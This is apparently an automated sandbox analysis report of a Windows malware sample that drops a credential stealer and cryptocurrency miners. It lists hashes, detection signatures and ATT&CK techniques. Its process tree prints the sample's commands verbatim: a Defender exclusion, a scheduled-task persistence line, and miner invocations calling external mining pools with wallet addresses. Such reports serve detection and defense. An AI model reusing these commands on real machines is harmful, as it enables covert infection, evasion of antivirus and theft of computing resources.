b57943849425f3f3a4cc66192d47a1f15900c627f4bad7da4280ad72da553b8c

Analysis

max time kernel
106s
max time network
137s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
02-01-2023 19:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Build-5064047735-69594.exe
Size

793KB
MD5

be1c30feca41f897c83974288b591f9a
SHA1

82ca8fb9b994f8c99a6156e14057f4e5eab2a025
SHA256

b57943849425f3f3a4cc66192d47a1f15900c627f4bad7da4280ad72da553b8c
SHA512

4e6b87a008dc822c3671a258c92b9aef511a017137d5a6e7cf5db78d96eaec3e19643b69ee4249958b2fa0c4e2c1d0174dc659feb102cdfb5ad0ee41fc7a6557
SSDEEP

24576:hLAt3ieGOGoNOcfLtAz2QFPlePWBoy2Ij:te/VNLFIAPxdY

Score

9^/10

miner spyware stealer upx

Malware Config

Signatures

Detectes Phoenix Miner Payload 4 IoCs

miner

resource	yara_rule
behavioral1/memory/1068-122-0x0000000140829C40-mapping.dmp	miner_phoenix
behavioral1/memory/1068-125-0x0000000140000000-0x000000014082B000-memory.dmp	miner_phoenix
behavioral1/memory/1068-126-0x0000000140000000-0x000000014082B000-memory.dmp	miner_phoenix
behavioral1/memory/1068-127-0x0000000140000000-0x000000014082B000-memory.dmp	miner_phoenix

Downloads MZ/PE file

Executes dropped EXE 2 IoCs

pid	Process
1720	ixtzvonexumbdfmp.exe
1636	ghoul.exe

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1068-118-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral1/memory/1068-120-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral1/memory/1068-121-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral1/memory/1068-123-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral1/memory/1068-124-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral1/memory/1068-125-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral1/memory/1068-126-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral1/memory/1068-127-0x0000000140000000-0x000000014082B000-memory.dmp	upx

Loads dropped DLL 6 IoCs

pid	Process
1708	Build-5064047735-69594.exe
1720	ixtzvonexumbdfmp.exe
1708	Build-5064047735-69594.exe
1708	Build-5064047735-69594.exe
1708	Build-5064047735-69594.exe
1708	Build-5064047735-69594.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1068	RegSvcs.exe
1068	RegSvcs.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1636 set thread context of 2032	1636	ghoul.exe	38
PID 1636 set thread context of 1068	1636	ghoul.exe	41

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1112	1708	WerFault.exe	26

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1284	schtasks.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
588	powershell.exe
1636	ghoul.exe
1636	ghoul.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1636	ghoul.exe
Token: SeDebugPrivilege	588	powershell.exe

Suspicious use of WriteProcessMemory 46 IoCs

description	pid	Process	procid_target
PID 1708 wrote to memory of 1720	1708	Build-5064047735-69594.exe	29
PID 1708 wrote to memory of 1720	1708	Build-5064047735-69594.exe	29
PID 1708 wrote to memory of 1720	1708	Build-5064047735-69594.exe	29
PID 1708 wrote to memory of 1720	1708	Build-5064047735-69594.exe	29
PID 1720 wrote to memory of 1636	1720	ixtzvonexumbdfmp.exe	30
PID 1720 wrote to memory of 1636	1720	ixtzvonexumbdfmp.exe	30
PID 1720 wrote to memory of 1636	1720	ixtzvonexumbdfmp.exe	30
PID 1720 wrote to memory of 1636	1720	ixtzvonexumbdfmp.exe	30
PID 1636 wrote to memory of 588	1636	ghoul.exe	31
PID 1636 wrote to memory of 588	1636	ghoul.exe	31
PID 1636 wrote to memory of 588	1636	ghoul.exe	31
PID 1708 wrote to memory of 1112	1708	Build-5064047735-69594.exe	33
PID 1708 wrote to memory of 1112	1708	Build-5064047735-69594.exe	33
PID 1708 wrote to memory of 1112	1708	Build-5064047735-69594.exe	33
PID 1708 wrote to memory of 1112	1708	Build-5064047735-69594.exe	33
PID 1636 wrote to memory of 512	1636	ghoul.exe	34
PID 1636 wrote to memory of 512	1636	ghoul.exe	34
PID 1636 wrote to memory of 512	1636	ghoul.exe	34
PID 512 wrote to memory of 1284	512	cmd.exe	36
PID 512 wrote to memory of 1284	512	cmd.exe	36
PID 512 wrote to memory of 1284	512	cmd.exe	36
PID 1636 wrote to memory of 2032	1636	ghoul.exe	38
PID 1636 wrote to memory of 2032	1636	ghoul.exe	38
PID 1636 wrote to memory of 2032	1636	ghoul.exe	38
PID 1636 wrote to memory of 2032	1636	ghoul.exe	38
PID 1636 wrote to memory of 2032	1636	ghoul.exe	38
PID 1636 wrote to memory of 2032	1636	ghoul.exe	38
PID 1636 wrote to memory of 2032	1636	ghoul.exe	38
PID 1636 wrote to memory of 2032	1636	ghoul.exe	38
PID 1636 wrote to memory of 2032	1636	ghoul.exe	38
PID 1636 wrote to memory of 2032	1636	ghoul.exe	38
PID 1636 wrote to memory of 2032	1636	ghoul.exe	38
PID 1636 wrote to memory of 2032	1636	ghoul.exe	38
PID 1636 wrote to memory of 2032	1636	ghoul.exe	38
PID 1636 wrote to memory of 2032	1636	ghoul.exe	38
PID 1636 wrote to memory of 2032	1636	ghoul.exe	38
PID 2032 wrote to memory of 1216	2032	vbc.exe	39
PID 2032 wrote to memory of 1216	2032	vbc.exe	39
PID 2032 wrote to memory of 1216	2032	vbc.exe	39
PID 1636 wrote to memory of 1068	1636	ghoul.exe	41
PID 1636 wrote to memory of 1068	1636	ghoul.exe	41
PID 1636 wrote to memory of 1068	1636	ghoul.exe	41
PID 1636 wrote to memory of 1068	1636	ghoul.exe	41
PID 1636 wrote to memory of 1068	1636	ghoul.exe	41
PID 1636 wrote to memory of 1068	1636	ghoul.exe	41
PID 1636 wrote to memory of 1068	1636	ghoul.exe	41

C:\Users\Admin\AppData\Local\Temp\Build-5064047735-69594.exe
"C:\Users\Admin\AppData\Local\Temp\Build-5064047735-69594.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1708
- C:\Users\Admin\AppData\Local\Temp\ixtzvonexumbdfmp.exe
  "ixtzvonexumbdfmp.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1720
- - C:\Users\Admin\AppData\Local\Temp\ghoul.exe
    "C:\Users\Admin\AppData\Local\Temp\ghoul.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1636
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:588
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "PFCIA" /tr "C:\ProgramData\Adobe\PFCIA.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:512
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "PFCIA" /tr "C:\ProgramData\Adobe\PFCIA.exe"
        5⤵
        Creates scheduled task(s)
        
        PID:1284
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RN9B8LkT5BcYXbc4ZVMYitfgKaA1wwbXwy.work -p x -t 3
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2032
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cls
        5⤵
        
        PID:1216
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe -pool ssl://eu1-etc.ethermine.org:5555 -wal 0x20caf9B2c7aB54C3cB949F1489DD697327131861.Rig001 -coin etc -log 0
      4⤵
      Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:1068
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 820
  2⤵
  - Program crash
  PID:1112

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Scripting

T1064

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Scripting

T1064

Credential Access

Credentials in Files

T1081

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\ghoul.exe

Filesize
899KB

MD5
813862d29c21094ebd1f95feb80771ff

SHA1
5e61691a9d791e798e19d99a27c9f9959d319e9b

SHA256
5f1c900332c6ce00349719a6eccd13894fc312f2b6460d7f419ca49172c8623a

SHA512
97fc207a77d4d11103817998177d656e520b889d7b79c9dd1ab4fd66cf1004a9060f2d6e4acf239a7b8016ffd60949a36e4e78ae26f990768a2952275e5b4580

Download Submit
C:\Users\Admin\AppData\Local\Temp\ghoul.exe

Filesize
899KB

MD5
813862d29c21094ebd1f95feb80771ff

SHA1
5e61691a9d791e798e19d99a27c9f9959d319e9b

SHA256
5f1c900332c6ce00349719a6eccd13894fc312f2b6460d7f419ca49172c8623a

SHA512
97fc207a77d4d11103817998177d656e520b889d7b79c9dd1ab4fd66cf1004a9060f2d6e4acf239a7b8016ffd60949a36e4e78ae26f990768a2952275e5b4580

Download Submit
C:\Users\Admin\AppData\Local\Temp\ixtzvonexumbdfmp.exe

Filesize
1.5MB

MD5
4c8d2d06487d07ec350aa5c5d699bb55

SHA1
adc4aa68f5aa4b0ea3f9a2ee82100234caea5b2d

SHA256
5fe74ecfd6a9eeef45bed3760e4511c300dc843d17120361e5abd021cc107567

SHA512
37f5dcf4a4e5f02c5dfb0d4c5cb18d4980efe387572fc3a50fa0d53a23c4403d8c17dbf2df9fa5bb647c0eb1f0a24d4c86e19aa2fb73b447c6cd62c6652b6bab

Download Submit
C:\Users\Admin\AppData\Local\Temp\ixtzvonexumbdfmp.exe

Filesize
1.5MB

MD5
4c8d2d06487d07ec350aa5c5d699bb55

SHA1
adc4aa68f5aa4b0ea3f9a2ee82100234caea5b2d

SHA256
5fe74ecfd6a9eeef45bed3760e4511c300dc843d17120361e5abd021cc107567

SHA512
37f5dcf4a4e5f02c5dfb0d4c5cb18d4980efe387572fc3a50fa0d53a23c4403d8c17dbf2df9fa5bb647c0eb1f0a24d4c86e19aa2fb73b447c6cd62c6652b6bab

Download Submit
\Users\Admin\AppData\Local\Temp\freebl3.dll

Filesize
669KB

MD5
ed6249f72ba742802b2fa3ef20900d18

SHA1
6e50eec3f0b13ff71f86ffc46cf7a1d079381bf3

SHA256
a5396eba9d0564f4bcbafd5a8c4a4019b4b50a5c70a42aef5491a230d21f2922

SHA512
6da4cd5642becef120dbde2d070332d08bf5779bc0ffe66bf3cc51ca13db5619ee0b4f8fe3bc897c1876614a2512b2598f5d1c372764dd18b474081004d87c98

Download Submit
\Users\Admin\AppData\Local\Temp\ghoul.exe

Filesize
899KB

MD5
813862d29c21094ebd1f95feb80771ff

SHA1
5e61691a9d791e798e19d99a27c9f9959d319e9b

SHA256
5f1c900332c6ce00349719a6eccd13894fc312f2b6460d7f419ca49172c8623a

SHA512
97fc207a77d4d11103817998177d656e520b889d7b79c9dd1ab4fd66cf1004a9060f2d6e4acf239a7b8016ffd60949a36e4e78ae26f990768a2952275e5b4580

Download Submit
\Users\Admin\AppData\Local\Temp\ixtzvonexumbdfmp.exe

Filesize
1.5MB

MD5
4c8d2d06487d07ec350aa5c5d699bb55

SHA1
adc4aa68f5aa4b0ea3f9a2ee82100234caea5b2d

SHA256
5fe74ecfd6a9eeef45bed3760e4511c300dc843d17120361e5abd021cc107567

SHA512
37f5dcf4a4e5f02c5dfb0d4c5cb18d4980efe387572fc3a50fa0d53a23c4403d8c17dbf2df9fa5bb647c0eb1f0a24d4c86e19aa2fb73b447c6cd62c6652b6bab

Download Submit
\Users\Admin\AppData\Local\Temp\mozglue.dll

Filesize
627KB

MD5
5d59e053d45049ffb8c6c08d8944e30c

SHA1
292f748d5e326143c3233e9d290087337700d606

SHA256
bcbf8c8ba4386b7716d5481ef9d089b9448990736d3eebdcfa611a09045c3ec3

SHA512
0f8b1c9c30d7b71fb7560377e5895c7bd15d71928c34465b1dde31ae770b6d38d5bac4d34ef4add9e08b72f2b9ea53958f167b0690fa0731af205528512a987b

Download Submit
\Users\Admin\AppData\Local\Temp\nss3.dll

Filesize
2.0MB

MD5
05ed4ffbf6b785750d2cdacca9287f10

SHA1
579c656536ce9cd076fc790cf443caf3a8db5b8f

SHA256
0bce97e8f6cc435250fb6aea0441e4146c7c8f8d90a9b1e76dfabd8701bfd882

SHA512
dddabf3ab629ec5b15e879f90d5f9bb69d6a8b47222989d3e683cbc8a6d4072740a5c5db05952d236529dfdde645990d21a4a9b32c4419ace9e2fe409fce4f01

Download Submit
\Users\Admin\AppData\Local\Temp\softokn3.dll

Filesize
251KB

MD5
3a59b504f6c41324b0d6cb6edbe3ad61

SHA1
2b3aff110badd913d221605d2f01638473dc5756

SHA256
c10801dba6c50237dba700fe2be920f091792e45c32e00db7c63c2c19a35f3a5

SHA512
56c9b7d4afcf8666aedaf55f819b799f2d84bc0736e0c431973114ae760da57209041785b7894f8b6d8d3e70bf040db68f7a95fcbb419fb6c44b70266eecc02d

Download Submit
memory/588-69-0x000007FEED8F0000-0x000007FEEE313000-memory.dmp

Filesize
10.1MB

Download
memory/588-70-0x000007FEECD90000-0x000007FEED8ED000-memory.dmp

Filesize
11.4MB

Download
memory/588-68-0x000007FEFBD81000-0x000007FEFBD83000-memory.dmp

Filesize
8KB

Download
memory/588-90-0x00000000024CB000-0x00000000024EA000-memory.dmp

Filesize
124KB

Download
memory/588-71-0x00000000024C4000-0x00000000024C7000-memory.dmp

Filesize
12KB

Download
memory/588-89-0x00000000024C4000-0x00000000024C7000-memory.dmp

Filesize
12KB

Download
memory/588-84-0x000000001B740000-0x000000001BA3F000-memory.dmp

Filesize
3.0MB

Download
memory/1068-123-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/1068-124-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/1068-125-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/1068-126-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/1068-121-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/1068-127-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/1068-120-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/1068-118-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/1068-117-0x0000000140000000-0x000000014082B000-memory.dmp

Filesize
8.2MB

Download
memory/1636-66-0x0000000000F20000-0x0000000001006000-memory.dmp

Filesize
920KB

Download
memory/1708-112-0x0000000061E00000-0x0000000061EF3000-memory.dmp

Filesize
972KB

Download
memory/1708-72-0x0000000061E00000-0x0000000061EF3000-memory.dmp

Filesize
972KB

Download
memory/1708-82-0x0000000061E00000-0x0000000061EF3000-memory.dmp

Filesize
972KB

Download
memory/1708-54-0x0000000076121000-0x0000000076123000-memory.dmp

Filesize
8KB

Download
memory/1720-59-0x0000000001360000-0x00000000014EC000-memory.dmp

Filesize
1.5MB

Download
memory/1720-65-0x0000000000686000-0x0000000000697000-memory.dmp

Filesize
68KB

Download
memory/2032-106-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/2032-94-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/2032-113-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/2032-97-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/2032-115-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/2032-116-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/2032-95-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/2032-109-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/2032-108-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/2032-99-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/2032-105-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/2032-104-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/2032-103-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/2032-102-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/2032-100-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download